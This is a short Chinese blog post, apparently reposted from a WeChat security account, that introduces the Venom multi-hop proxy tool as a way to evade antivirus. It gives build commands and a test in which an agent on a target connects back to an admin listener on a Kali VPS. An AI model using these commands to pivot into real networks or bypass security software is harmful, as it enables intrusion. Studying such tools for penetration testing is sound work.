在前期的文章中,我们讲到过很多次关于免杀的文章。由于时效问题,很多方法已经不能免杀了。本文为大家介绍另外一种基于Go开发的多级代理工具
Venom
Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
作者项目地址:https://github.com/Dliv3/Venom
功能特性
-
可视化网络拓扑 -
多级socks5代理 -
多级端口转发 -
端口复用 (apache/mysql/...) -
ssh隧道 -
交互式shell -
文件的上传和下载 -
节点间通信加密 -
支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)
安装
我们可以利用下面的命令,进行编译安装。
go get -u github.com/Dliv3/Venom/...# $GOPATH是安装Go时配置的环境变量,可通过go env命令查看cd$GOPATH/src/github.com/Dliv3/Venom# 编译好的二进制文件存放在当前目录下的release文件夹中./build.sh
当然可以直接下载使用release中编译好的可执行文件.
测试
admin监听端口,agent发起连接: 在 vps ( kali ) 上 , 上传 admin 端,执行下面命令
./admin_linux_x64 -lport8888-passwd kali
连接
agent.exe -rhost192.168.123.57-rport8888-passwd kali
360 电脑管家等平台尚未测试,大家可以自行测试。
原文始发于微信公众号(kali笔记):利用多级代理实现免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论